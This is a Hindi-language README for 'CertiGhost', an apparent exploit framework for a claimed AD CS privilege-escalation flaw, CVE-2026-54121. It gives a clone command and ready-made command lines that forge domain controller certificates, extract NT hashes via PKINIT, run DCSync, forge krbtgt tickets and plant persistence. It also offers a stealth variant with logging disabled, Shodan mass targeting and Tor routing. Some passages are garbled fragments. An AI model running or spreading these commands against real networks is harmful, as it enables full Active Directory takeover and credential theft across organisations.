
👻 CVE-2026-54121 - सर्वश्रेष्ठ CertiGhost AD CS Multi-Exploit Framework | फर्जी DC/LDAP सर्वर, प्रमाणपत्र दुरुपयोग, PKINIT हैश निष्कर्षण के साथ उन्नत टूलकिट। विशेषताएं: सुरक्षित जांच का पता लगाएं, पूर्ण मल्टी-थ्रेडेड एक्सप्लॉइट। 🛡️ CVSS 8.8 High - नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒

एक्सप्लॉइट फ्रेमवर्क और ऑडिट टूलकिट
केवल अधिकृत सुरक्षा परीक्षण के लिए।
यह टूल केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए पूर्ण रूप से ज़िम्मेदार हैं कि परीक्षण से पहले उनके पास लक्ष्य स्वामी से स्पष्ट लिखित अनुमति हो। लागू संघीय, राज्य और अंतर्राष्ट्रीय साइबर अपराध कानूनों के तहत कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस सॉफ़्टवेयर का उपयोग करके, आप निम्नलिखित से सहमत होते हैं:
⚠️ चेतावनी: Active Directory विशेषाधिकार उन्नयन भेद्यताएं उद्यम अवसंरचना के लिए उच्च जोखिम प्रस्तुत करती हैं। अनधिकृत परीक्षण सख्त वर्जित है।
CVE-2026-54121 (उपनाम "Certighost") Microsoft Active Directory Certificate Services (AD CS) में एक विशेषाधिकार उन्नयन (EoP) भेद्यता है। यह निम्न-विशेषाधिकार वाले डोमेन उपयोगकर्ताओं को डोमेन कंट्रोलर मशीन खातों की नकल करने और प्रमाणपत्र जालसाजी के माध्यम से पूर्ण डोमेन एडमिन अधिग्रहण प्राप्त करने की अनुमति देता है।
CWE-285) के कारण मौजूद है।DCSync संचालन निष्पादित करने के लिए Kerberos/PKINIT के माध्यम से प्रमाणित करता है।detect_ip हटा दें, और लॉगिंग और आउटपुट अक्षम कर दें। इस संस्करण के लिए "stealthcert.py" का उपयोग करें।git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#install requirements
# Auto-discovers CA via LDAP, creates temp computer, spawns rogue servers, requests certificate with cdc redirect, extracts DC's NT hash via PKINIT, enables DCSync for domain takeover
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10
# Impersonates a specific Domain Controller (DC01$). Useful when you know exactly which DC to target. Bypasses auto-discovery
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$
# Uses NTLM hash instead of password. Works when password is unknown but hash is obtained. ':' before hash = empty LM hash
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10
# Bypasses LDAP CA discovery. Uses explicitly provided CA IP and name. Useful when LDAP is restricted or CA is on different subnet
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"
# Native LDAP query to check if AD CS is present. Returns CA name and DNS. Read-only, safe for production. No exploitation performed
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect
# Runs native AD CS detection then calls Python certighost.py with all parameters. Requires certighost.py in same directory. Prints NT hash and ccache file
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$
#Detection only mode. Saves results in JSON format. Useful for automation, reporting, and integration with other security tools
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json
यह भेद्यता प्रमाणपत्र नामांकन प्रक्रियाओं के दौरान Active Directory Certificate Services (AD CS) के भीतर अनुचित प्राधिकरण और सत्यापन जांच (CWE-285) से उत्पन्न होती है। निम्न-विशेषाधिकार वाले डोमेन क्रेडेंशियल वाला हमलावर प्रमाणपत्र प्राधिकरण (CA) को एक दुष्ट एंडपॉइंट के विरुद्ध पहचान अभिकथन सत्यापित करने के लिए धोखा देने हेतु लक्ष्य पुनर्निर्देशन मापदंडों में हेरफेर कर सकता है।
भेद्य एंडपॉइंट / अनुरोध संदर्भ:
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded
... (Certificate Request payload with manipulated target/cdc parameters)
चेज़ लक्ष्य हेरफेर: एक हमलावर प्रमाणपत्र अनुरोध के भीतर लक्ष्य पुनर्निर्देशन मापदंडों (जैसे cdc / चेज़ लक्ष्य) को संशोधित करता है, जिससे प्रमाणपत्र प्राधिकरण (CA) सत्यापन ट्रैफ़िक को एक निर्दिष्ट एंडपॉइंट पर रूट करने के लिए मजबूर होता है।
दुष्ट सर्वर पुनर्निर्देशन: प्रमाणपत्र प्राधिकरण (CA) यह मान्य किए बिना कि लक्ष्य एक वैध और अधिकृत डोमेन कंट्रोलर है, क्लाइंट द्वारा आपूर्ति किए गए गंतव्य के लिए LDAP या SMB कनेक्शन शुरू करता है।
DC पहचान जालसाजी और प्रमाणपत्र जारी करना: हमलावर के नियंत्रण में दुष्ट सर्वर लक्षित डोमेन कंट्रोलर खाते की ओर से CA द्वारा जारी सत्यापन क्वेरी का उत्तर देता है। इस प्रतिक्रिया पर भरोसा करते हुए, CA डोमेन कंट्रोलर की पहचान रखने वाला एक वैध, हस्ताक्षरित प्रमाणपत्र जारी करता है।
प्राप्त डोमेन कंट्रोलर प्रमाणपत्र का उपयोग करके, उच्च-विशेषाधिकार वाला TGT प्राप्त करने के लिए PKINIT (प्रारंभिक प्रमाणीकरण के लिए सार्वजनिक कुंजी क्रिप्टोग्राफी) के माध्यम से Kerberos प्रमाणीकरण किया जाता है।
डोमेन कंट्रोलर विशेषाधिकार रखने वाले Kerberos टिकट के साथ, Active Directory डेटाबेस में सभी खातों के पासवर्ड हैश (जैसे, krbtgt, Administrator) DCSync तकनीक का उपयोग करके निकाले जाते हैं।
krbtgt खाते के पासवर्ड हैश का उपयोग करके TGT को मांग पर जाली बनाया जाता है।msDS-KeyCredentialLink गुण में अनधिकृत प्रमाणपत्र कुंजियाँ जोड़ी जाती हैं ताकि स्थायी पहुंच सुरक्षित रहे।| विशेषता | मान |
|---|
| 📅 खोजा गया / पैच किया गया | जुलाई 2026 (Microsoft Patch Tuesday) |
| ⚠️ CVSS स्कोर | 8.8 (उच्च) |
| 🏷️ कोडनेम | Certighost |
| 🎯 प्रभावित उत्पाद | Microsoft Active Directory Certificate Services |
| 🔄 स्थिर संस्करण | जुलाई 2026 सुरक्षा अद्यतन |
| 🔓 प्रमाणीकरण | निम्न-विशेषाधिकार वाला डोमेन खाता |
| 🌍 प्रभाव | पूर्ण Active Directory डोमेन समझौता |
| पैरामीटर | विवरण | उदाहरण |
|---|
-d, --domain | लक्ष्य डोमेन DNS नाम (आवश्यक) | -d playground.local |
-u, --username | निम्न-विशेषाधिकार वाला डोमेन उपयोगकर्ता (आवश्यक) | -u lowpriv |
-p, --password | उपयोगकर्ता पासवर्ड | -p Password123 |
-H, --hashes | NTLM हैश [LM:]NT | -H :8846f7eaee8fb117ad06bdd830b7586c |
--dc-ip | डोमेन कंट्रोलर IP (आवश्यक) | --dc-ip 192.168.1.10 |
--ca-ip | प्रमाणपत्र प्राधिकरण IP (वैकल्पिक) | --ca-ip 192.168.1.20 |
--ca | CA नाम (सेट न होने पर स्वतः खोजा जाता है) | --ca "PLAYGROUND-CA" |
--listener | दुष्ट सर्वरों के लिए हमलावर IP | --listener 192.168.1.100 |
--target-san | प्रतिरूपण करने के लिए कंप्यूटर खाता (जैसे DC01$) | --target-san DC01$ |
--template | प्रमाणपत्र टेम्पलेट (डिफ़ॉल्ट: Machine) | --template Machine |
--computer-name | मौजूदा कंप्यूटर खाता नाम ($ के साथ) | --computer-name GHOSTABCD$ |
--computer-pass | मौजूदा कंप्यूटर पासवर्ड | --computer-pass CGabc123... |
--computer-hash | मौजूदा कंप्यूटर NT हैश | --computer-hash 8846f7ea... |
--use-ldap | LDAPS (636) के बजाय LDAP (389) का उपयोग करें | --use-ldap |
--exploit | शोषण करें | --exploit |
--detect | केवल पहचान (कोई शोषण नहीं) | --detect |
-t, --threads | बड़े पैमाने पर स्कैनिंग के लिए अधिकतम थ्रेड | -t 10 |
--timeout | प्रति अनुरोध टाइमआउट (सेकंड) | --timeout 10 |
--retry | विफलता पर पुनः प्रयास संख्या | --retry 3 |
--delay | अनुरोधों के बीच आधार विलंब | --delay 1.0 |
--proxy | प्रॉक्सी URL | --proxy http://127.0.0.1:8080 |
--no-verify | SSL सत्यापन अक्षम करें | --no-verify |
--tor | Tor प्रॉक्सी का उपयोग करें (socks5h://127.0.0.1:9050) | --tor |
-o, --output | आउटपुट फ़ाइल (.json, .csv, .jsonl) | -o results.json |
-v, --verbose | विस्तृत आउटपुट | -v |
-q, --quiet | शांत मोड | -q |
-h, --help | सहायता दिखाएं | -h |
| पैरामीटर | विवरण | उदाहरण |
|---|
-t, --target | लक्ष्य CA IP या होस्टनाम (आवश्यक) | -t 192.168.1.20 |
-d, --domain | लक्ष्य डोमेन DNS नाम (आवश्यक) | -d playground.local |
--dc-ip | डोमेन कंट्रोलर IP (आवश्यक) | --dc-ip 192.168.1.10 |
-u, --username | निम्न-विशेषाधिकार वाला डोमेन उपयोगकर्ता (आवश्यक) | -u lowpriv |
-p, --password | उपयोगकर्ता पासवर्ड | -p Password123 |
-H, --hashes | NTLM हैश [LM:]NT | -H :8846f7eaee8fb117ad06bdd830b7586c |
--computer-name | मौजूदा कंप्यूटर खाता नाम ($ के साथ) | --computer-name GHOSTABCD$ |
--computer-pass | मौजूदा कंप्यूटर पासवर्ड | --computer-pass CGabc123... |
--computer-hash | मौजूदा कंप्यूटर NT हैश | --computer-hash 8846f7ea... |
--target-account | प्रतिरूपण करने के लिए खाता (जैसे DC01$) | --target-account DC01$ |
--template | प्रमाणपत्र टेम्पलेट (डिफ़ॉल्ट: Machine) | --template Machine |
--listener | दुष्ट सर्वरों के लिए हमलावर IP (सेट न होने पर स्वतः पहचान) | --listener 192.168.1.100 |
--use-ldap | LDAPS (636) के बजाय LDAP (389) का उपयोग करें | --use-ldap |
--keep-files | .pfx और .ccache फ़ाइलें रखें (डिफ़ॉल्ट: हटाएं) | --keep-files |
-h, --help | सहायता दिखाएं | -h |
| पैरामीटर | विवरण | उदाहरण |
|---|
-u, --url | लक्ष्य CA IP या होस्टनाम | -u 192.168.1.20 |
-l, --list | लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक) | -l targets.txt |
--shodan | Shodan से लक्ष्य लोड करें | --shodan |
--shodan-query | Shodan खोज क्वेरी | --shodan-query "AD CS Certificate" |
-d, --domain | लक्ष्य डोमेन DNS नाम (आवश्यक) | -d playground.local |
--dc-ip | डोमेन कंट्रोलर IP (आवश्यक) | --dc-ip 192.168.1.10 |
--username | निम्न-विशेषाधिकार वाला डोमेन उपयोगकर्ता (आवश्यक) | --username lowpriv |
-p, --password | उपयोगकर्ता पासवर्ड | -p Password123 |
-H, --hashes | NTLM हैश [LM:]NT | -H :8846f7ea... |
--computer-name | मौजूदा कंप्यूटर खाता नाम ($ के साथ) | --computer-name GHOSTABCD$ |
--computer-pass | मौजूदा कंप्यूटर पासवर्ड | --computer-pass CGabc123... |
--computer-hash | मौजूदा कंप्यूटर NT हैश | --computer-hash 8846f7ea... |
--target-account | प्रतिरूपण करने के लिए खाता (जैसे DC01$) | --target-account DC01$ |
--template | प्रमाणपत्र टेम्पलेट (डिफ़ॉल्ट: Machine) | --template Machine |
--listener | दुष्ट सर्वरों के लिए हमलावर IP | --listener 192.168.1.100 |
--use-ldap | LDAPS (636) के बजाय LDAP (389) का उपयोग करें | --use-ldap |
--exploit | शोषण करें | --exploit |
--detect | केवल पहचान (कोई शोषण नहीं) | --detect |
-t, --threads | बड़े पैमाने पर स्कैनिंग के लिए अधिकतम थ्रेड | -t 10 |
--timeout | प्रति अनुरोध टाइमआउट (सेकंड) | --timeout 10 |
--retry | विफलता पर पुनः प्रयास संख्या | --retry 3 |
--delay | अनुरोधों के बीच आधार विलंब | --delay 1.0 |
--proxy | प्रॉक्सी URL | --proxy http://127.0.0.1:8080 |
--no-verify | SSL सत्यापन अक्षम करें | --no-verify |
--tor | Tor प्रॉक्सी का उपयोग करें | --tor |
-o, --output | आउटपुट फ़ाइल (.json, .csv, .jsonl) | -o results.json |
-v, --verbose | विस्तृत आउटपुट | -v |
-q, --quiet | शांत मोड | -q |
-h, --help | सहायता दिखाएं | -h |